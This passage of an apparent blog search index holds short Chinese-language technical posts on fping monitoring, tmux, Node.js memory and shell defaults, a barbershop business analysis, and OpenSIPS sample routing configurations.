avg, 0% loss) [1592643930.965753] 192.168.40.20 : [1], 84 bytes, 5.25 ms (4.23 avg, 0% loss) [1592643930.972833] 192.168.40.21 : [1], 84 bytes, 1.14 ms (1.18 avg, 0% loss) [1592643932.965636] 192.168.40.20 : [2], 84 bytes, 3.45 ms (3.97 avg, 0% loss) [1592643932.978245] 192.168.40.21 : [2], 84 bytes, 4.39 ms (2.25 avg, 0% loss) [1592643934.991354] 192.168.40.20 : [3], 84 bytes, 27.9 ms (9.96 avg, 0% loss) [1592643934.991621] 192.168.40.21 : [3], 84 bytes, 14.9 ms (5.42 avg, 0% loss) [1592643936.978135] 192.168.40.20 : [4], 84 bytes, 11.3 ms (10.2 avg, 0% loss) [1592643936.979620] 192.168.40.21 : [4], 84 bytes, 1.37 ms (4.61 avg, 0% loss) ","permalink":"https://wdd.js.org/posts/2020/06/qtdzvr/","summary":"新建一个文件 ip.list.cfg, 包含所有的带测试的ip地址。\n192.168.40.20 192.168.40.21 执行命令:\nnohup fping -D -u -l -p 2000 -f ip.list.cfg \u0026amp; -D 显示时间戳 -u 显示不可达的目标 -l 持续的ping -p 每隔多少毫秒执行一次 -f 指定ip列表文件 在nohup.out中,回持续的显示到各个ip的网络状况。\n[1592643928.961414] 192.168.40.20 : [0], 84 bytes, 3.22 ms (3.22 avg, 0% loss) [1592643928.969987] 192.168.40.21 : [0], 84 bytes, 1.22 ms (1.22 avg, 0% loss) [1592643930.965753] 192.168.40.20 : [1], 84 bytes, 5.25 ms (4.23 avg, 0% loss) [1592643930.972833] 192.168.40.21 : [1], 84 bytes, 1.14 ms (1.","title":"fping 网络状态监控测试"},{"content":".zshrc配置 vim ~/.zshrc plugins=(git tmux) # 加入tmux, 然后保存退出 source ~/.zshrc tmux 快捷键 Alias Command Description ta tmux attach -t Attach new tmux session to already running named session tad tmux attach -d -t Detach named tmux session ts tmux new-session -s Create a new named tmux session tl tmux list-sessions Displays a list of running tmux sessions tksv tmux kill-server Terminate all running tmux sessions tkss tmux kill-session -t Terminate named running tmux session tmux _zsh_tmux_plugin_run Start a new tmux session ","permalink":"https://wdd.js.org/posts/2020/06/rh9zsc/","summary":".zshrc配置 vim ~/.zshrc plugins=(git tmux) # 加入tmux, 然后保存退出 source ~/.zshrc tmux 快捷键 Alias Command Description ta tmux attach -t Attach new tmux session to already running named session tad tmux attach -d -t Detach named tmux session ts tmux new-session -s Create a new named tmux session tl tmux list-sessions Displays a list of running tmux sessions tksv tmux kill-server Terminate all running tmux sessions tkss tmux kill-session -t Terminate named running tmux session tmux _zsh_tmux_plugin_run Start a new tmux session ","title":"oh-my-zsh 安装 tmux插件"},{"content":"GC释放时机 当HeapUsed接近最大堆内存时,出发GC释放。 下图是深夜,压力比较小的时候。 下图是上午工作时间\n内存泄漏 OOM ","permalink":"https://wdd.js.org/fe/nodejs-gc-times/","summary":"GC释放时机 当HeapUsed接近最大堆内存时,出发GC释放。 下图是深夜,压力比较小的时候。 下图是上午工作时间\n内存泄漏 OOM ","title":"Nodejs Gc Times"},{"content":"","permalink":"https://wdd.js.org/posts/2020/06/elg2v2/","summary":"","title":"Nodejs诊断报告"},{"content":"process.memoryUsage() { rss: 4935680, heapTotal: 1826816, heapUsed: 650472, external: 49879, arrayBuffers: 9386 } heapTotal 和 heapUsed指向V8\u0026rsquo;s 内存使用 external 指向 C++ 对象的内存使用, C++对象绑定js对象,并且由V8管理 rss, 实际占用内存,包括C++, js对象和代码三块的总计。使用 ps aux命令输出时,rss的值对应了RSS列的数值 node js 所有buffer占用的内存 heapTotal and heapUsed refer to V8\u0026rsquo;s memory usage. external refers to the memory usage of C++ objects bound to JavaScript objects managed by V8. rss, Resident Set Size, is the amount of space occupied in the main memory device (that is a subset of the total allocated memory) for the process, including all C++ and JavaScript objects and code. arrayBuffers refers to memory allocated for ArrayBuffers and SharedArrayBuffers, including all Node.js Buffers. This is also included in the external value. When Node.js is used as an embedded library, this value may be 0 because allocations for ArrayBuffers may not be tracked in that case. process.resourceUsage() userCPUTime maps to ru_utime computed in microseconds. It is the same value as process.cpuUsage().user. systemCPUTime maps to ru_stime computed in microseconds. It is the same value as process.cpuUsage().system. maxRSS maps to ru_maxrss which is the maximum resident set size used in kilobytes. sharedMemorySize maps to ru_ixrss but is not supported by any platform. unsharedDataSize maps to ru_idrss but is not supported by any platform. unsharedStackSize maps to ru_isrss but is not supported by any platform. minorPageFault maps to ru_minflt which is the number of minor page faults for the process, see this article for more details. majorPageFault maps to ru_majflt which is the number of major page faults for the process, see this article for more details. This field is not supported on Windows. swappedOut maps to ru_nswap but is not supported by any platform. fsRead maps to ru_inblock which is the number of times the file system had to perform input. fsWrite maps to ru_oublock which is the number of times the file system had to perform output. ipcSent maps to ru_msgsnd but is not supported by any platform. ipcReceived maps to ru_msgrcv but is not supported by any platform. signalsCount maps to ru_nsignals but is not supported by any platform. voluntaryContextSwitches maps to ru_nvcsw which is the number of times a CPU context switch resulted due to a process voluntarily giving up the processor before its time slice was completed (usually to await availability of a resource). This field is not supported on Windows. involuntaryContextSwitches maps to ru_nivcsw which is the number of times a CPU context switch resulted due to a higher priority process becoming runnable or because the current process exceeded its time slice. This field is not supported on Windows. console.log(process.resourceUsage()); /* Will output: { userCPUTime: 82872, systemCPUTime: 4143, maxRSS: 33164, sharedMemorySize: 0, unsharedDataSize: 0, unsharedStackSize: 0, minorPageFault: 2469, majorPageFault: 0, swappedOut: 0, fsRead: 0, fsWrite: 8, ipcSent: 0, ipcReceived: 0, signalsCount: 0, voluntaryContextSwitches: 79, involuntaryContextSwitches: 1 } */ ","permalink":"https://wdd.js.org/fe/nodejs-mem-usage/","summary":"process.memoryUsage() { rss: 4935680, heapTotal: 1826816, heapUsed: 650472, external: 49879, arrayBuffers: 9386 } heapTotal 和 heapUsed指向V8\u0026rsquo;s 内存使用 external 指向 C++ 对象的内存使用, C++对象绑定js对象,并且由V8管理 rss, 实际占用内存,包括C++, js对象和代码三块的总计。使用 ps aux命令输出时,rss的值对应了RSS列的数值 node js 所有buffer占用的内存 heapTotal and heapUsed refer to V8\u0026rsquo;s memory usage. external refers to the memory usage of C++ objects bound to JavaScript objects managed by V8. rss, Resident Set Size, is the amount of space occupied in the main memory device (that is a subset of the total allocated memory) for the process, including all C++ and JavaScript objects and code.","title":"Nodejs Mem Usage"},{"content":"v8内存模型 Code Segment: 代码被实际执行 Stack 本地变量 指向引用的变量 流程控制,例如函数 Heap V8负责管理 HeapTotal 堆的总大小 HeapUsed 实际使用的大小 Shallow size of an object: 对象自身占用的内存 Retained size of an object: 对象及其依赖对象删除后回释放的内存 ","permalink":"https://wdd.js.org/fe/nodejs-memory-model/","summary":"v8内存模型 Code Segment: 代码被实际执行 Stack 本地变量 指向引用的变量 流程控制,例如函数 Heap V8负责管理 HeapTotal 堆的总大小 HeapUsed 实际使用的大小 Shallow size of an object: 对象自身占用的内存 Retained size of an object: 对象及其依赖对象删除后回释放的内存 ","title":"Nodejs Memory Model"},{"content":"从各种层次排查了问题,包括\ndocker版本不一样 脚本不一样 镜像的问题 \u0026hellip; 从各种角度排查过后,却发现,问题在是拼写错误。环境变量没有设置对,导致进程无法前台运行。\n能不拼写就不要拼写!!直接复制。\n大文件在传输图中可能会文件损坏,最好使用md5sum计算文件校验和,然后做对比。\n","permalink":"https://wdd.js.org/posts/2020/06/ghpbm9/","summary":"从各种层次排查了问题,包括\ndocker版本不一样 脚本不一样 镜像的问题 \u0026hellip; 从各种角度排查过后,却发现,问题在是拼写错误。环境变量没有设置对,导致进程无法前台运行。\n能不拼写就不要拼写!!直接复制。\n大文件在传输图中可能会文件损坏,最好使用md5sum计算文件校验和,然后做对比。","title":"解决问题的最后一个思路:拼写错误!!"},{"content":" webrtc的各种demo https://webrtc.github.io/samples/ 在线音频处理 https://audiomass.co/ 值得深入阅读,关于如何demo的思考 https://kitsonkelly.com/posts/deno-is-a-browser-for-code/ 不错的介绍demo的博客 https://kitsonkelly.com/posts js如何获取音频视频 https://www.webdevdrops.com/en/how-to-access-device-cameras-with-javascript/ bats可以用来测试shell脚本 https://github.com/bats-core/bats-core 手绘风格的流程图 https://excalidraw.com/ ","permalink":"https://wdd.js.org/posts/2020/06/gbm9n6/","summary":" webrtc的各种demo https://webrtc.github.io/samples/ 在线音频处理 https://audiomass.co/ 值得深入阅读,关于如何demo的思考 https://kitsonkelly.com/posts/deno-is-a-browser-for-code/ 不错的介绍demo的博客 https://kitsonkelly.com/posts js如何获取音频视频 https://www.webdevdrops.com/en/how-to-access-device-cameras-with-javascript/ bats可以用来测试shell脚本 https://github.com/bats-core/bats-core 手绘风格的流程图 https://excalidraw.com/ ","title":"01 手绘风格的流程图"},{"content":"用法 Parameter What does it do? ${VAR:-STRING} If VAR is empty or unset, use STRING as its value. ${VAR-STRING} If VAR is unset, use STRING as its value. ${VAR:=STRING} If VAR is empty or unset, set the value of VAR to STRING. ${VAR=STRING} If VAR is unset, set the value of VAR to STRING. ${VAR:+STRING} If VAR is not empty, use STRING as its value. ${VAR+STRING} If VAR is set, use STRING as its value. ${VAR:?STRING} Display an error if empty or unset. ${VAR?STRING} Display an error if unset. 例子 执行下面的例子,如果环境变量中 CONF 的值存在,则取 CONF 的值,否则用默认值 7\n#/bin/bash a=${CONF:-\u0026#34;7\u0026#34;} echo $a; ","permalink":"https://wdd.js.org/shell/default-var/","summary":"用法 Parameter What does it do? ${VAR:-STRING} If VAR is empty or unset, use STRING as its value. ${VAR-STRING} If VAR is unset, use STRING as its value. ${VAR:=STRING} If VAR is empty or unset, set the value of VAR to STRING. ${VAR=STRING} If VAR is unset, set the value of VAR to STRING. ${VAR:+STRING} If VAR is not empty, use STRING as its value. ${VAR+STRING} If VAR is set, use STRING as its value.","title":"设置变量默认值"},{"content":"1. 理发店分类 类别 店面大小 并发理发人数 业务范围 消费者画像 定价 A(单一理发类) 较小 4-6 理发、染发、烫发 学生、普通工人 较低 B(综合服务类) 较大 12-20 理发、染发、烫发、美容、减肥、刮痧、按摩、脱毛等等 白领、老板等有一定经济能力者 中上 2. 如何吸引顾客上门? 优惠卡:在理发店营业之前,往往可以以极低的价格,派发理发卡。例如办理20元理发5次这样的理发卡。这样在理发店营业之初,就会有足够的客户上门理发。 认知偏差:很多理发店会门口挂个横幅: x+x+x 仅需5元。全场套餐仅需1折。其实这些都是吸引顾客的钩子,而真正的前提条件,往往是要办理xxxx元的会员卡。 3. 如何吸引客户更多的消费? 对于B类理发店来说,一般情况下顾客进店之后,并不会对其立即理发。而需要一位服务员进行理发前的准备,例如头部按摩、颈部刮痧、肩部按摩的放松准备。也可能会上一些茶水,糖果瓜子之类的食品。\n进入理发店,除了有理发的消费之外,还可能纯在其他的消费机会。而消费机会的前提在于**服务人员和顾客之间的沟通。所以以为能够察言寡色的服务员则显得尤为重要。如果顾客一句话也不说,那也是无法让其更多的消费的。常见的沟通手法如下:\n发现顾客身上的小瑕疵,进而咨询顾客是否需要专业的人员帮您看看。(注意这一步一定不要立即推荐套餐服务,这样会立即引起顾客的反感情绪。) 经过专业人员的查看之后,一般会向客户推荐比较优惠的体验一次的项目。因为体验一次往往是话费比较小的。如果上来给客户推荐一两千的套餐,客户一般会拒绝。 简单的套餐体验过后,可以向顾客推荐套餐,以及如果使用套餐,单次理疗会更加优惠。 总得理念就是:循序渐诱,不可操之过急\n4. 如何留住顾客? 理发店顾客粘性一般比较小,周围四五家理发店,顾客凭什么再次光顾你这家呢?\n答案就是:会员卡\n","permalink":"https://wdd.js.org/posts/2020/05/frut12/","summary":"1. 理发店分类 类别 店面大小 并发理发人数 业务范围 消费者画像 定价 A(单一理发类) 较小 4-6 理发、染发、烫发 学生、普通工人 较低 B(综合服务类) 较大 12-20 理发、染发、烫发、美容、减肥、刮痧、按摩、脱毛等等 白领、老板等有一定经济能力者 中上 2. 如何吸引顾客上门? 优惠卡:在理发店营业之前,往往可以以极低的价格,派发理发卡。例如办理20元理发5次这样的理发卡。这样在理发店营业之初,就会有足够的客户上门理发。 认知偏差:很多理发店会门口挂个横幅: x+x+x 仅需5元。全场套餐仅需1折。其实这些都是吸引顾客的钩子,而真正的前提条件,往往是要办理xxxx元的会员卡。 3. 如何吸引客户更多的消费? 对于B类理发店来说,一般情况下顾客进店之后,并不会对其立即理发。而需要一位服务员进行理发前的准备,例如头部按摩、颈部刮痧、肩部按摩的放松准备。也可能会上一些茶水,糖果瓜子之类的食品。\n进入理发店,除了有理发的消费之外,还可能纯在其他的消费机会。而消费机会的前提在于**服务人员和顾客之间的沟通。所以以为能够察言寡色的服务员则显得尤为重要。如果顾客一句话也不说,那也是无法让其更多的消费的。常见的沟通手法如下:\n发现顾客身上的小瑕疵,进而咨询顾客是否需要专业的人员帮您看看。(注意这一步一定不要立即推荐套餐服务,这样会立即引起顾客的反感情绪。) 经过专业人员的查看之后,一般会向客户推荐比较优惠的体验一次的项目。因为体验一次往往是话费比较小的。如果上来给客户推荐一两千的套餐,客户一般会拒绝。 简单的套餐体验过后,可以向顾客推荐套餐,以及如果使用套餐,单次理疗会更加优惠。 总得理念就是:循序渐诱,不可操之过急\n4. 如何留住顾客? 理发店顾客粘性一般比较小,周围四五家理发店,顾客凭什么再次光顾你这家呢?\n答案就是:会员卡","title":"理发店的营业模式分析"},{"content":"opensips 1.x 使用各种flag去设置一个呼叫是否需要记录。从opensips 2.2开始,不再使用flag的方式,而使用 do_accounting() 函数去标记是否需要记录呼叫。\n注意 do_accounting()函数并不是收到SIP消息后立即写呼叫记录,也仅仅是做一个标记。实际的写数据库或者写日志发生在事务或者dialog完成的时候。\n","permalink":"https://wdd.js.org/opensips/ch6/acc/","summary":"opensips 1.x 使用各种flag去设置一个呼叫是否需要记录。从opensips 2.2开始,不再使用flag的方式,而使用 do_accounting() 函数去标记是否需要记录呼叫。\n注意 do_accounting()函数并不是收到SIP消息后立即写呼叫记录,也仅仅是做一个标记。实际的写数据库或者写日志发生在事务或者dialog完成的时候。","title":"acc呼叫记录模块"},{"content":"# # this example shows how to use forking on failure # log_level=3 log_stderror=1 listen=192.168.2.16 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwards==0, or excessively long requests if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # skip register for testing purposes if (is_methos(\u0026#34;REGISTER\u0026#34;)) { sl_send_reply(\u0026#34;200\u0026#34;, \u0026#34;ok\u0026#34;); exit; }; if (is_method(\u0026#34;INVITE\u0026#34;)) { seturi(\u0026#34;sip:xxx@192.168.2.16:5064\u0026#34;); # if transaction broken, try other an alternative route t_on_failure(\u0026#34;1\u0026#34;); # if a provisional came, stop alternating t_on_reply(\u0026#34;1\u0026#34;); }; t_relay(); } failure_route[1] { log(1, \u0026#34;trying at alternate destination\\n\u0026#34;); seturi(\u0026#34;sip:yyy@192.168.2.16:5064\u0026#34;); t_relay(); } onreply_route[1] { log(1, \u0026#34;reply came in\\n\u0026#34;); if ($rs=~\u0026#34;18[0-9]\u0026#34;) { log(1, \u0026#34;provisional -- resetting negative failure\\n\u0026#34;); t_on_failure(\u0026#34;0\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/serial-183/","summary":"# # this example shows how to use forking on failure # log_level=3 log_stderror=1 listen=192.168.2.16 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwards==0, or excessively long requests if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # skip register for testing purposes if (is_methos(\u0026#34;REGISTER\u0026#34;)) { sl_send_reply(\u0026#34;200\u0026#34;, \u0026#34;ok\u0026#34;); exit; }; if (is_method(\u0026#34;INVITE\u0026#34;)) { seturi(\u0026#34;sip:xxx@192.","title":"serial_183"},{"content":"# # demo script showing how to set-up usrloc replication # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=yes # (cmd line: -E) # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;auth.so\u0026#34; loadmodule \u0026#34;auth_db.so\u0026#34; # ----------------- setting module-specific parameters --------------- # digest generation secret; use the same in backup server; # also, make sure that the backup server has sync\u0026#39;ed time modparam(\u0026#34;auth\u0026#34;, \u0026#34;secret\u0026#34;, \u0026#34;alsdkhglaksdhfkloiwr\u0026#34;) # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwars==0, or excessively long requests if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # if the request is for other domain use UsrLoc # (in case, it does not work, use the following command # with proper names and addresses in it) if (is_myself(\u0026#34;$rd\u0026#34;)) { if ($rm==\u0026#34;REGISTER\u0026#34;) { # verify credentials if (!www_authorize(\u0026#34;foo.bar\u0026#34;, \u0026#34;subscriber\u0026#34;)) { www_challenge(\u0026#34;foo.bar\u0026#34;, \u0026#34;0\u0026#34;); exit; }; # if ok, update contacts and ... save(\u0026#34;location\u0026#34;); # ... if this REGISTER is not a replica from our # peer server, replicate to the peer server $var(backup_ip) = \u0026#34;backup.foo.bar\u0026#34; {ip.resolve}; if (!$si==$var(backup_ip)) { t_replicate(\u0026#34;sip:backup.foo.bar:5060\u0026#34;); }; exit; }; # do whatever else appropriate for your domain log(\u0026#34;non-REGISTER\\n\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/replicate/","summary":"# # demo script showing how to set-up usrloc replication # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=yes # (cmd line: -E) # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;auth.so\u0026#34; loadmodule \u0026#34;auth_db.so\u0026#34; # ----------------- setting module-specific parameters --------------- # digest generation secret; use the same in backup server; # also, make sure that the backup server has sync\u0026#39;ed time modparam(\u0026#34;auth\u0026#34;, \u0026#34;secret\u0026#34;, \u0026#34;alsdkhglaksdhfkloiwr\u0026#34;) # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwars==0, or excessively long requests if (!","title":"replicate"},{"content":"# # $Id$ # # this example shows use of ser as stateless redirect server # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ # for testing purposes, simply okay all REGISTERs if ($rm==\u0026#34;REGISTER\u0026#34;) { log(\u0026#34;REGISTER\u0026#34;); sl_send_reply(\u0026#34;200\u0026#34;, \u0026#34;ok\u0026#34;); return; }; # rewrite current URI, which is always part of destination ser rewriteuri(\u0026#34;sip:parallel@siphub.net:9\u0026#34;); # append one more URI to the destination ser append_branch(\u0026#34;sip:redirect@siphub.net:9\u0026#34;); # redirect now sl_send_reply(\u0026#34;300\u0026#34;, \u0026#34;Redirect\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/ch8/redirect/","summary":"# # $Id$ # # this example shows use of ser as stateless redirect server # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ # for testing purposes, simply okay all REGISTERs if ($rm==\u0026#34;REGISTER\u0026#34;) { log(\u0026#34;REGISTER\u0026#34;); sl_send_reply(\u0026#34;200\u0026#34;, \u0026#34;ok\u0026#34;); return; }; # rewrite current URI, which is always part of destination ser rewriteuri(\u0026#34;sip:parallel@siphub.net:9\u0026#34;); # append one more URI to the destination ser append_branch(\u0026#34;sip:redirect@siphub.","title":"redirect"},{"content":"# # $Id$ # # example: ser configured as PSTN gateway guard; PSTN gateway is located # at 192.168.0.10 # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;auth.so\u0026#34; loadmodule \u0026#34;auth_db.so\u0026#34; loadmodule \u0026#34;group.so\u0026#34; loadmodule \u0026#34;uri.so\u0026#34; # ----------------- setting module-specific parameters --------------- modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;db_url\u0026#34;,\u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # -- acc params -- modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_level\u0026#34;, 1) # that is the flag for which we will account -- don\u0026#39;t forget to # set the same one :-) modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1 ) # ------------------------- request routing logic ------------------- # main routing logic route{ /* ********* ROUTINE CHECKS ********************************** */ # filter too old messages if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { log(\u0026#34;LOG: Too many hops\\n\u0026#34;); sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; /* ********* RR ********************************** */ /* grant Route routing if route headers present */ if (loose_route()) { t_relay(); exit; }; /* record-route INVITEs -- all subsequent requests must visit us */ if ($rm==\u0026#34;INVITE\u0026#34;) { record_route(); }; # now check if it really is a PSTN destination which should be handled # by our gateway; if not, and the request is an invitation, drop it -- # we cannot terminate it in PSTN; relay non-INVITE requests -- it may # be for example BYEs sent by gateway to call originator if (!$ru=~\u0026#34;sip:\\+?[0-9]+@.*\u0026#34;) { if ($rm==\u0026#34;INVITE\u0026#34;) { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34;Call cannot be served here\u0026#34;); } else { forward(); }; exit; }; # account completed transactions via syslog setflag(1); # free call destinations ... no authentication needed if ( is_user_in(\u0026#34;Request-URI\u0026#34;, \u0026#34;free-pstn\u0026#34;) /* free destinations */ || $ru=~\u0026#34;sip:[79][0-9][0-9][0-9]@.*\u0026#34; /* local PBX */ || $ru=~\u0026#34;sip:98[0-9][0-9][0-9][0-9]\u0026#34;) { log(\u0026#34;free call\u0026#34;); } else if ($si==192.168.0.10) { # our gateway doesn\u0026#39;t support digest authentication; # verify that a request is coming from it by source # address log(\u0026#34;gateway-originated request\u0026#34;); } else { # in all other cases, we need to check the request against # access control lists; first of all, verify request # originator\u0026#39;s identity if (!proxy_authorize(\t\u0026#34;gateway\u0026#34; /* realm */, \u0026#34;subscriber\u0026#34; /* table name */)) { proxy_challenge( \u0026#34;gateway\u0026#34; /* realm */, \u0026#34;0\u0026#34; /* no qop */ ); exit; }; # authorize only for INVITEs -- RR/Contact may result in weird # things showing up in d-uri that would break our logic; our # major concern is INVITE which causes PSTN costs if ($rm==\u0026#34;INVITE\u0026#34;) { # does the authenticated user have a permission for local # calls (destinations beginning with a single zero)? # (i.e., is he in the \u0026#34;local\u0026#34; group?) if ($ru=~\u0026#34;sip:0[1-9][0-9]+@.*\u0026#34;) { if (!is_user_in(\u0026#34;credentials\u0026#34;, \u0026#34;local\u0026#34;)) { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34;No permission for local calls\u0026#34;); exit; }; # the same for long-distance (destinations begin with two zeros\u0026#34;) } else if ($ru=~\u0026#34;sip:00[1-9][0-9]+@.*\u0026#34;) { if (!is_user_in(\u0026#34;credentials\u0026#34;, \u0026#34;ld\u0026#34;)) { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34; no permission for LD \u0026#34;); exit; }; # the same for international calls (three zeros) } else if ($ru=~\u0026#34;sip:000[1-9][0-9]+@.*\u0026#34;) { if (!is_user_in(\u0026#34;credentials\u0026#34;, \u0026#34;int\u0026#34;)) { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34;International permissions needed\u0026#34;); exit; }; # everything else (e.g., interplanetary calls) is denied } else { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34;Forbidden\u0026#34;); exit; }; }; # INVITE to authorized PSTN }; # authorized PSTN # if you have passed through all the checks, let your call go to GW! rewritehostport(\u0026#34;192.168.0.10:5060\u0026#34;); # forward the request now if (!t_relay()) { sl_reply_error(); exit; }; } ","permalink":"https://wdd.js.org/opensips/ch8/pstn/","summary":"# # $Id$ # # example: ser configured as PSTN gateway guard; PSTN gateway is located # at 192.168.0.10 # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;auth.so\u0026#34; loadmodule \u0026#34;auth_db.so\u0026#34; loadmodule \u0026#34;group.so\u0026#34; loadmodule \u0026#34;uri.so\u0026#34; # ----------------- setting module-specific parameters --------------- modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;db_url\u0026#34;,\u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # -- acc params -- modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_level\u0026#34;, 1) # that is the flag for which we will account -- don\u0026#39;t forget to # set the same one :-) modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1 ) # ------------------------- request routing logic ------------------- # main routing logic route{ /* ********* ROUTINE CHECKS ********************************** */ # filter too old messages if (!","title":"pstn"},{"content":"# # simple quick-start config script including nathelper support # This default script includes nathelper support. To make it work # you will also have to install Maxim\u0026#39;s RTP proxy. The proxy is enforced # if one of the parties is behind a NAT. # # If you have an endpoing in the public internet which is known to # support symmetric RTP (Cisco PSTN gateway or voicemail, for example), # then you don\u0026#39;t have to force RTP proxy. If you don\u0026#39;t want to enforce # RTP proxy for some destinations than simply use t_relay() instead of # route(1) # # Sections marked with !! Nathelper contain modifications for nathelper # # NOTE !! This config is EXPERIMENTAL ! # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) /* Uncomment these lines to enter debugging mode */ #debug_mode=yes check_via=no\t# (cmd. line: -v) dns=no # (cmd. line: -r) rev_dns=no # (cmd. line: -R) port=5060 children=4 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database #loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;signaling.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;mi_fifo.so\u0026#34; # Uncomment this if you want digest authentication # db_mysql.so must be loaded ! #loadmodule \u0026#34;auth.so\u0026#34; #loadmodule \u0026#34;auth_db.so\u0026#34; # !! Nathelper loadmodule \u0026#34;nathelper.so\u0026#34; loadmodule \u0026#34;rtpproxy.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- mi_fifo params -- modparam(\u0026#34;mi_fifo\u0026#34;, 